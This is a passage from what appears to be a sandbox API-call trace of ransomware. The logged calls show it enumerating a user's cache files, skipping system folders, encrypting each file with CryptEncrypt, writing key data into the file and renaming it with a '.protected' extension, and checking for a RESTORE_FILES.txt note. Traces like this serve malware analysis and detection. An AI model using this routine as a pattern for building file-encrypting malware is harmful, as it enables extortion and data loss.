HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.608] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 151 [0088.608] StrStrW (lpFirst="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpSrch=".txt") returned 0x0 [0088.608] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 151 [0088.608] StrStrW (lpFirst="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpSrch=".rar") returned 0x0 [0088.608] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 151 [0088.608] StrStrW (lpFirst="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpSrch=".zip") returned 0x0 [0088.608] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x5ab, lpOverlapped=0x0) returned 1 [0088.658] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa55, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.658] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5ab, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x5ab, lpOverlapped=0x0) returned 1 [0088.659] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.659] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.659] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.659] CloseHandle (hObject=0x150) returned 1 [0088.659] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.protected") returned 161 [0088.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6.protected")) returned 1 [0088.660] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.660] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="Windows") returned -1 [0088.660] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="Program Files") returned -1 [0088.660] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="Program Files (x86)") returned -1 [0088.660] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="$Recycle.bin") returned 1 [0088.660] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="System Volume Information") returned -1 [0088.660] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 151 [0088.660] StrStrIW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpSrch=".protected") returned 0x0 [0088.660] lstrcmpW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="RESTORE_FILES.txt") returned -1 [0088.660] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.661] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.662] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 151 [0088.662] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpSrch=".txt") returned 0x0 [0088.662] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 151 [0088.662] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpSrch=".rar") returned 0x0 [0088.662] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 151 [0088.662] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpSrch=".zip") returned 0x0 [0088.662] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x652, lpOverlapped=0x0) returned 1 [0088.666] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff9ae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.666] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x652, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x652, lpOverlapped=0x0) returned 1 [0088.666] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.666] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.666] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.666] CloseHandle (hObject=0x150) returned 1 [0088.666] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.protected") returned 161 [0088.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e.protected")) returned 1 [0088.667] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.667] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="Windows") returned -1 [0088.667] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="Program Files") returned -1 [0088.667] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="Program Files (x86)") returned -1 [0088.667] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="$Recycle.bin") returned 1 [0088.667] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="System Volume Information") returned -1 [0088.667] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 151 [0088.667] StrStrIW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpSrch=".protected") returned 0x0 [0088.667] lstrcmpW 
(lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="RESTORE_FILES.txt") returned -1 [0088.667] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.667] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.668] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 151 [0088.668] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpSrch=".txt") returned 0x0 [0088.668] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 151 [0088.668] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpSrch=".rar") returned 0x0 [0088.668] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 151 [0088.668] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpSrch=".zip") returned 0x0 [0088.668] ReadFile (in: 
hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x652, lpOverlapped=0x0) returned 1 [0088.685] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff9ae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.685] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x652, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x652, lpOverlapped=0x0) returned 1 [0088.685] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.685] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.685] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.685] CloseHandle (hObject=0x150) returned 1 [0088.686] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.protected") returned 161 [0088.686] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061.protected")) returned 1 [0088.687] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.687] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="Windows") returned -1 [0088.687] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="Program Files") returned -1 [0088.687] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="Program Files (x86)") returned -1 [0088.687] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="$Recycle.bin") returned 1 [0088.687] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="System Volume Information") returned -1 [0088.687] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 151 [0088.687] StrStrIW (lpFirst="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpSrch=".protected") returned 0x0 [0088.687] lstrcmpW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="RESTORE_FILES.txt") returned -1 [0088.687] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.687] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295e794*=0x30) returned 1 [0088.687] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.696] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 151 [0088.696] StrStrW (lpFirst="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpSrch=".txt") returned 0x0 [0088.696] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 151 [0088.696] StrStrW (lpFirst="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpSrch=".rar") returned 0x0 [0088.696] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 151 [0088.696] StrStrW (lpFirst="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpSrch=".zip") returned 0x0 [0088.696] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0088.697] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.697] WriteFile (in: 
hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d7, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0088.697] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.697] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.697] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.698] CloseHandle (hObject=0x150) returned 1 [0088.700] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.protected") returned 161 [0088.700] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450.protected")) returned 1 [0088.703] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: 
lpFindFileData=0x295e7d0) returned 1 [0088.703] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="Windows") returned -1 [0088.703] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="Program Files") returned -1 [0088.703] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="Program Files (x86)") returned -1 [0088.703] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="$Recycle.bin") returned 1 [0088.703] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="System Volume Information") returned -1 [0088.703] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 151 [0088.703] StrStrIW (lpFirst="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpSrch=".protected") returned 0x0 [0088.703] lstrcmpW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="RESTORE_FILES.txt") returned -1 [0088.703] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.703] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.703] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.704] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 151 [0088.704] StrStrW (lpFirst="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpSrch=".txt") returned 0x0 [0088.704] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 151 [0088.704] StrStrW (lpFirst="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpSrch=".rar") returned 0x0 [0088.704] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 